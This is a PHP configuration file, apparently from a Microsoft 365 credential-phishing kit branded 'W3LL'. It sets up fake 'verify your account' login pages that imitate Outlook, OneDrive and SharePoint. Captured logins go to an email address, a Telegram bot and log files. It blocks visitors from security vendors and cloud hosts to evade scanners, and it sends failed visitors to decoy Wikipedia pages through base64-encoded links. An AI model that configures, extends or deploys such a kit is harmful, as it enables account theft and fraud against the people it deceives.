<?php
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
// DONT CHANGE ANYTHING BELOW THIS LINE DO CHANGE FROM ADMIN PANEL INSTEAD
if(!isset($_SESSION)) 
{ 
    session_start(); 
}
$page_version = 'OV6-8-23-23';
$toEmail = 'EMAIL RESULT HERE';
$token = 'TOKEN HERE';
$antibot = true;
$advanced = true;
$blockedISPs = array("microsoft", "leaseweb", "m247", "amazon", "ovh", "cogent", "alibaba", "digitalocean", "choopa", "linode", "google", "oracle", "layer-host", "dedicated-fiber-communications", "worldstream", "nextglobalservices", "itproximus", "hostroyale", "centurylink", "avast", "bitdefender", "webnx", "myloc-as");
$captha = true;
$capthaopt = 'google';
$cfsitekey = '';
$reporttele = false;
$teletoken = 'BOT TOKEN HERE';
$telechatid = 'TELEGRAM GROUP CHAT ID HERE';
$emailtag = 'EMAIL TAG HERE';
$officevalid = true;
$reportinvalid = true;
$AutoGrab = false;
$Resetlogs = false;
$ResetAllow = true;
$onlylistemails = false;
$onlyonetimeuse = false;
$successMsgTitle = 'Success';
$successMsg = 'Successfully confirmed<br/>Redirecting to Document...';
$successMsgTimeout = '3000';
$visitorfileName = 'power.txt';
$logsfileName = 'ranger.txt';
$botfileName = 'thecause.txt';
$blacklist = 'blacklist.txt';
$fromname = 'Logs';
$subjectTitle = '| [GIFT FROM W3LL]';
$officeLink = 'https://support.microsoft.com/en-us/office/-something-went-wrong-error-when-you-try-to-start-an-office-app-4b4471dd-cf86-4a37-910d-35a01a6c7d17';
$firstmsg = 5;
$back = 'default';
$imageURL = "";
$style = "";
switch ($back) {
    case 'payment':
        $imageURL = "url('images/excel.png');";
        break;
    case 'outlook':
        $imageURL = "url('images/outlook.png');";
        break;
    case 'onedrive':
        $imageURL = "url('images/onedrive.png');";
        break;
    case 'office':
        $imageURL = "url('images/365.png');";
        break;
    case 'sharepoint':
        $imageURL = "url('images/sharepoint.png');";
        break;
    case 'default':
        $style = '<style>body::before {
            content: ""; /* Empty content to allow the pseudo-element to render */
            position: absolute; /* Make it an absolute position */
            top: 0; /* Starting from the top */
            left: 0; /* Starting from the left */
            right: 0; /* Stretching to the right */
            bottom: 0; /* Stretching to the bottom */
            z-index: -1; /* Put it behind the content */
            background-image: <?= $imageURL ?>;
            filter: invert(100%); /* This will invert only the background image */
            -webkit-filter:invert(100%);
        }</style>';
        $imageURL = "url('images/028048032804238403284032804382.webp');";
        break;
    default:
        $imageURL = "url('images/$back');";
        break;
}
$base64encodeData = true;
$limitedarea = false;
$fixIndex = false;
$randfirstpart = base64_encode($_SERVER['REQUEST_URI']);
$TitlesArray=array("Verify your account","Verify your identity","Verify your credentials","Verify your informations","Verify your email","Verify your login","Confirm your account","Confirm your identity","Confirm your credentials","Confirm your information","Confirm your email","Confirm your login","Signin to your account","Connect your account");
$link = array("aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfMzY1","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9MaXN0X29mX01pY3Jvc29mdF8zNjVfQXBwbGljYXRpb25z","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DYXRlZ29yeTpPZmZpY2VfMzY1","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2lkLndpa2lwZWRpYS5vcmcvd2lraS9CZXJrYXM6TG9nb19NaWNyb3NvZnRfT2ZmaWNlXzM2NV8oMjAxMy0yMDE5KS5zdmc=","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfT2ZmaWNlX01peA==","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfRXhjaGFuZ2VfU2VydmVy","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9FbWFpbF9jbGllbnQ=","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9FbWFpbA==","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DbGllbnRfYWNjZXNzX2xpY2Vuc2U=","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE2","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE5","aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9JbnRlcm5ldF9FeHBsb3Jlcl8xMQ==");
$random = rand(0, 11);
$FailRedirect = base64_decode($link[$random]);
// DONT CHANGE ANYTHING ABOVE THIS LINE
?>